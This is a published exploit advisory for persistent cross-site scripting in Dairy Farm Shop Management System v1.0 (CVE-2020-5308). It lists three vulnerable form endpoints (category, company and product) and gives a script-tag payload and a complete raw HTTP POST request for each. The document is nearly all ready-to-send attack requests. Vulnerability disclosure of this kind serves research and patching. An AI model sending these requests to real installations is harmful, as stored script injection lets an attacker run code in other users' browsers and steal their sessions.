# Exploit Title: Dairy Farm Shop Management System v1.0 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: Chris Inzinga
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
# CVE: CVE-2020-5308

================ 1. - Cross Site Scripting (Persistent) ================

URL: http://192.168.0.33/dfsms/add-category.php
Method: POST
Parameter(s): 'category' & 'categorycode'
Payload: <script>alert(1)</script>

POST /dfsms/add-category.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-category.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

category=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&categorycode=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=



================ 2. - Cross Site Scripting (Persistent) ================

URL: http://192.168.0.33/dfsms/add-company.php
Method: POST
Parameter(s): 'companyname'
Payload: <script>alert(1)</script>

POST /dfsms/add-company.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-company.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

companyname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=



================ 3. - Cross Site Scripting (Persistent) ================

URL: http://192.168.0.33/dfsms/add-product.php
Method: POST
Parameter(s): 'productname'
Payload: <script>alert(1)</script>

POST /dfsms/add-product.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/add-product.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1

category=test&company=test&productname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&productprice=1&submit=